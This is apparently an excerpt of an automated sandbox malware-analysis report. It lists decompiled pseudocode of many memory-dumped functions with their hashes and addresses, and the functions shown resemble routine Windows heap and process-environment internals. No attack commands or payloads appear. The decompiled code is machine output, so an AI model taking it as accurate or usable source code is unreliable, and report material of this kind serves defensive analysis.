                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: dda75da49a1b8aca91477b057e2f2720a37ae6aefbaf7d4e92f81b9ec4c9f48d
                                                                                                                                                    • Instruction ID: f25e41908ce6ac0e35cf9c61da0be4186a261b16a3b82ffe94e6817ecf88a671
                                                                                                                                                    • Opcode Fuzzy Hash: dda75da49a1b8aca91477b057e2f2720a37ae6aefbaf7d4e92f81b9ec4c9f48d
                                                                                                                                                    • Instruction Fuzzy Hash: 07F09AB3B177909FF7B5C768C004B22BBE89B05670F5888A7D43687201C6A6DCC0C290
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0310927A, Relevance: .0, Instructions: 32COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 54%
                                                                                                                                                    			E0310927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L030E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0310FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E031092C6(_t11, _t14);
				}
				return _t11;
			}





                                                                                                                                                    0x03109295
                                                                                                                                                    0x03109299
                                                                                                                                                    0x0310929f
                                                                                                                                                    0x031092aa
                                                                                                                                                    0x031092ad
                                                                                                                                                    0x031092ae
                                                                                                                                                    0x031092af
                                                                                                                                                    0x031092b0
                                                                                                                                                    0x031092b4
                                                                                                                                                    0x031092bb
                                                                                                                                                    0x031092bb
                                                                                                                                                    0x031092c5

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                                                                                    • Instruction ID: a4b9e0e9a6204bb104d021e71534ca3ec819900198b5971c60693ecdfa526e43
                                                                                                                                                    • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                                                                                    • Instruction Fuzzy Hash: C4E022723406406BEB21DE4ACC80F4377ADEFCAB20F044078B9001E293CBE6DC0987A0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03182073, Relevance: .0, Instructions: 32COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                    			E03182073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0317FD22(__ecx);
				_t19 =  *0x31b849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x31b8748; // 0x0
					if(__eflags <= 0) {
						E03181C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x31b8724 & 0x00000004;
							if(( *0x31b8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x31b8724; // 0x0
					return E03178DF1(__ebx, 0xc0000374, 0x31b5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                                                                                                                    0x03182076
                                                                                                                                                    0x03182078
                                                                                                                                                    0x0318207d
                                                                                                                                                    0x03182083
                                                                                                                                                    0x031820a4
                                                                                                                                                    0x031820aa
                                                                                                                                                    0x031820ac
                                                                                                                                                    0x031820b7
                                                                                                                                                    0x031820ba
                                                                                                                                                    0x031820bc
                                                                                                                                                    0x031820c9
                                                                                                                                                    0x031820c9
                                                                                                                                                    0x031820d0
                                                                                                                                                    0x031820d2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031820d2
                                                                                                                                                    0x031820be
                                                                                                                                                    0x031820c3
                                                                                                                                                    0x031820c5
                                                                                                                                                    0x031820c7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031820c7
                                                                                                                                                    0x031820bc
                                                                                                                                                    0x031820d4
                                                                                                                                                    0x03182085
                                                                                                                                                    0x03182085
                                                                                                                                                    0x031820a3
                                                                                                                                                    0x031820a3

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 80b0cd0e2ee7d719b912ee59ed7179608d2e09792332810ca36917eb0e11528c
                                                                                                                                                    • Instruction ID: b101ca17dc63f009e3544d3e6bef2b32066d678e9ca560a232dc26d2e208d557
                                                                                                                                                    • Opcode Fuzzy Hash: 80b0cd0e2ee7d719b912ee59ed7179608d2e09792332810ca36917eb0e11528c
                                                                                                                                                    • Instruction Fuzzy Hash: D9F0A03B4152D84BEE3BFF2875013E67BA9D74E514B1D1985D4901B208D73488C3CE28
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03198D34, Relevance: .0, Instructions: 32COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 43%
                                                                                                                                                    			E03198D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x31bd360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E030E7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0310B640(E03109AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                                                                                                                    0x03198d34
                                                                                                                                                    0x03198d43
                                                                                                                                                    0x03198d4b
                                                                                                                                                    0x03198d4e
                                                                                                                                                    0x03198d52
                                                                                                                                                    0x03198d5c
                                                                                                                                                    0x03198d6e
                                                                                                                                                    0x03198d5e
                                                                                                                                                    0x03198d67
                                                                                                                                                    0x03198d67
                                                                                                                                                    0x03198d79
                                                                                                                                                    0x03198d7a
                                                                                                                                                    0x03198d7c
                                                                                                                                                    0x03198d81
                                                                                                                                                    0x03198d94

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 7286141fb56b63820de5de2ec86c92cac19decc3622934c618b7319800b6a1da
                                                                                                                                                    • Instruction ID: fe1bec5372cd57b8a6b23928b5a3cec1503b6a30965855b35bf6cf32890aceed
                                                                                                                                                    • Opcode Fuzzy Hash: 7286141fb56b63820de5de2ec86c92cac19decc3622934c618b7319800b6a1da
                                                                                                                                                    • Instruction Fuzzy Hash: F7F0B474A0470C9FDB08EFB8D441A6EB7B4EF08700F108099E905EB291EB74D900C754
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03198B58, Relevance: .0, Instructions: 31COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 36%
                                                                                                                                                    			E03198B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x31bd360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E030E7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0310B640(E03109AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                                                                                                    0x03198b67
                                                                                                                                                    0x03198b6f
                                                                                                                                                    0x03198b72
                                                                                                                                                    0x03198b7d
                                                                                                                                                    0x03198b8f
                                                                                                                                                    0x03198b7f
                                                                                                                                                    0x03198b88
                                                                                                                                                    0x03198b88
                                                                                                                                                    0x03198b9a
                                                                                                                                                    0x03198b9b
                                                                                                                                                    0x03198b9d
                                                                                                                                                    0x03198ba2
                                                                                                                                                    0x03198bb5

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b581ea03ab5536ed8e7078b59af74bfc66cf70ebee7acd5eb47201304b190c0c
                                                                                                                                                    • Instruction ID: 261c9c1c460b713ef96df7210e39c0fd09cad20ca5b315fdf9017a86d2574c0a
                                                                                                                                                    • Opcode Fuzzy Hash: b581ea03ab5536ed8e7078b59af74bfc66cf70ebee7acd5eb47201304b190c0c
                                                                                                                                                    • Instruction Fuzzy Hash: 35F082B4A14258AFDF04EBA8E906E6EB3B4EF08700F040459BA15EF3D1EB74D900C794
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030C4F2E, Relevance: .0, Instructions: 31COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E030C4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E031988F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E030EC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x30a1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                                                                                                                                    0x030c4f2e
                                                                                                                                                    0x030c4f34
                                                                                                                                                    0x030c4f38
                                                                                                                                                    0x03120b85
                                                                                                                                                    0x03120b85
                                                                                                                                                    0x03120b89
                                                                                                                                                    0x03120b9a
                                                                                                                                                    0x03120b9a
                                                                                                                                                    0x03120b9f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03120b9f
                                                                                                                                                    0x03120b94
                                                                                                                                                    0x03120b98
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03120b98
                                                                                                                                                    0x030c4f3e
                                                                                                                                                    0x030c4f48
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030c4f6e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030c4f70

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4e540fce05a6734d0e0911b51cf16879f33ba7c54e6d5fb3e1d4fb1f648b0419
                                                                                                                                                    • Instruction ID: 4e2fabeca8f1415ed5407f7f2b21eb3e09101c82e85d36fe503ed16bfce3fd9f
                                                                                                                                                    • Opcode Fuzzy Hash: 4e540fce05a6734d0e0911b51cf16879f33ba7c54e6d5fb3e1d4fb1f648b0419
                                                                                                                                                    • Instruction Fuzzy Hash: 59F0E23A5227A88FD771C718C144B22BBD9AB0D77CF0846A5E4058B920C724ED90C680
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030E746D, Relevance: .0, Instructions: 31COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                    			E030E746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E030DEB70(__ecx, 0x31b79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E031095D0();
							L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                                                                                                                                    0x030e746d
                                                                                                                                                    0x030e746d
                                                                                                                                                    0x030e746d
                                                                                                                                                    0x030e7471
                                                                                                                                                    0x030e7488
                                                                                                                                                    0x0312f92d
                                                                                                                                                    0x030e748e
                                                                                                                                                    0x030e7491
                                                                                                                                                    0x030e7495
                                                                                                                                                    0x0312f937
                                                                                                                                                    0x0312f93a
                                                                                                                                                    0x0312f94e
                                                                                                                                                    0x0312f953
                                                                                                                                                    0x0312f956
                                                                                                                                                    0x0312f956
                                                                                                                                                    0x030e7495
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e7488
                                                                                                                                                    0x030e7473
                                                                                                                                                    0x030e7478
                                                                                                                                                    0x030e747d
                                                                                                                                                    0x030e7481
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e7481
                                                                                                                                                    0x030e747d
                                                                                                                                                    0x030e747a
                                                                                                                                                    0x00000000

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 06ece3696f0bc17a09917bfd7f739d54887225e3d45e30ed416c2b9b0744d341
                                                                                                                                                    • Instruction ID: 02e9f6bb6402b853137963ae0a5f5d616fee647032d70b7dfaeb8d970fd3367a
                                                                                                                                                    • Opcode Fuzzy Hash: 06ece3696f0bc17a09917bfd7f739d54887225e3d45e30ed416c2b9b0744d341
                                                                                                                                                    • Instruction Fuzzy Hash: 80F0597AB03244AFCF09E768C440FBEBFF1AF08A10F080557E4D1AB4A0E3249801C785
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03198CD6, Relevance: .0, Instructions: 31COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 36%
                                                                                                                                                    			E03198CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x31bd360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E030E7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0310B640(E03109AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                                                                                                    0x03198ce5
                                                                                                                                                    0x03198ced
                                                                                                                                                    0x03198cf0
                                                                                                                                                    0x03198cfb
                                                                                                                                                    0x03198d0d
                                                                                                                                                    0x03198cfd
                                                                                                                                                    0x03198d06
                                                                                                                                                    0x03198d06
                                                                                                                                                    0x03198d18
                                                                                                                                                    0x03198d19
                                                                                                                                                    0x03198d1b
                                                                                                                                                    0x03198d20
                                                                                                                                                    0x03198d33

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e9f4b8af7a103694e4f34c751ca45ef0232759d3b51afe53c7e1bc8644b389c4
                                                                                                                                                    • Instruction ID: 4bd79a99ef4d238201908689fc56161c7d8dfccd4ebbe7ff1d7cb7ffeab43d37
                                                                                                                                                    • Opcode Fuzzy Hash: e9f4b8af7a103694e4f34c751ca45ef0232759d3b51afe53c7e1bc8644b389c4
                                                                                                                                                    • Instruction Fuzzy Hash: 8BF05E75A09208ABDB08EBA8E945EAE77B4AF49200F14019AE915AB2D1EB74D9008754
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030FA44B, Relevance: .0, Instructions: 29COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E030FA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x31b7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L030E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0310FA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                                                                                                                                    0x030fa44b
                                                                                                                                                    0x030fa453
                                                                                                                                                    0x030fa472
                                                                                                                                                    0x030fa476
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030fa493
                                                                                                                                                    0x030fa47a
                                                                                                                                                    0x030fa47f
                                                                                                                                                    0x030fa486
                                                                                                                                                    0x00000000

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ef9c2143e2368739ce4b084f3568a3bac1774a5142d8ef7dfc34bc3f66d626b3
                                                                                                                                                    • Instruction ID: 33637594741d995cffb46fd911741147a93d3ad8cca7eb4560415fe4bca55738
                                                                                                                                                    • Opcode Fuzzy Hash: ef9c2143e2368739ce4b084f3568a3bac1774a5142d8ef7dfc34bc3f66d626b3
                                                                                                                                                    • Instruction Fuzzy Hash: DEE09272B02821AFD2219A18AC00F67B39DDBD8A51F094435E608DB654D668ED02CBE0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030CF358, Relevance: .0, Instructions: 28COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                                    			E030CF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E030FF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L030E4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                                                                                                                    0x030cf35d
                                                                                                                                                    0x030cf361
                                                                                                                                                    0x030cf367
                                                                                                                                                    0x030cf372
                                                                                                                                                    0x030cf38c
                                                                                                                                                    0x030cf38c
                                                                                                                                                    0x030cf394

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                                                                                    • Instruction ID: 14226b1c68e6cb6149ba236dbf005fbc8b0a06ef79405fc92b5589e8c6de298b
                                                                                                                                                    • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                                                                                    • Instruction Fuzzy Hash: 43E0D832A42218BFCB21D7D99D05FDEBBADDB84AA0F040156B904DB190D5619D00C3D1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030DFF60, Relevance: .0, Instructions: 22COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E030DFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x30a11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E031988F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E030E0050(_t14);
				}
			}










                                                                                                                                                    0x030dff66
                                                                                                                                                    0x030dff6b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030dff8f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030dff8f

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0d191707fedb367d07c8e0a6e7da131e8f4224c7dcbff938eb248edb73469c83
                                                                                                                                                    • Instruction ID: e82e9b277989e879a390bdf2358d69010618622cb4e206d2355fb58ca248624e
                                                                                                                                                    • Opcode Fuzzy Hash: 0d191707fedb367d07c8e0a6e7da131e8f4224c7dcbff938eb248edb73469c83
                                                                                                                                                    • Instruction Fuzzy Hash: 88E0DFB02073059FDB34DB96D040F2D77DC9F42629F1DC49EE00A4F101C6A1D880CA56
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0317D380, Relevance: .0, Instructions: 21COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0317D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L030CE8B0(__ecx, _a4, 0xfff);
					L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                                                                                                                                    0x0317d38a
                                                                                                                                                    0x0317d39b
                                                                                                                                                    0x0317d3b1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0317d3b6
                                                                                                                                                    0x00000000

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                                                                                    • Instruction ID: cf2524c746e3f7ccf08bf9fecd33f72b3d3d5ba0e4f45947206473d6df1a60d7
                                                                                                                                                    • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                                                                                    • Instruction Fuzzy Hash: 1FE0C235381348BBDB229E44DC00FA97B2AEF84BA1F144035FE085E690C6759C91E6C4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 031541E8, Relevance: .0, Instructions: 21COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                    			E031541E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x31a08f0);
				_t5 = E0311D08C(__ebx, __edi, __esi);
				if( *0x31b87ec == 0) {
					E030DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x31b87ec == 0) {
						 *0x31b87f0 = 0x31b87ec;
						 *0x31b87ec = 0x31b87ec;
						 *0x31b87e8 = 0x31b87e4;
						 *0x31b87e4 = 0x31b87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L03154248();
				}
				return E0311D0D1(_t5);
			}





                                                                                                                                                    0x031541e8
                                                                                                                                                    0x031541ea
                                                                                                                                                    0x031541ef
                                                                                                                                                    0x031541fb
                                                                                                                                                    0x03154206
                                                                                                                                                    0x0315420b
                                                                                                                                                    0x03154216
                                                                                                                                                    0x0315421d
                                                                                                                                                    0x03154222
                                                                                                                                                    0x0315422c
                                                                                                                                                    0x03154231
                                                                                                                                                    0x03154231
                                                                                                                                                    0x03154236
                                                                                                                                                    0x0315423d
                                                                                                                                                    0x0315423d
                                                                                                                                                    0x03154247

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
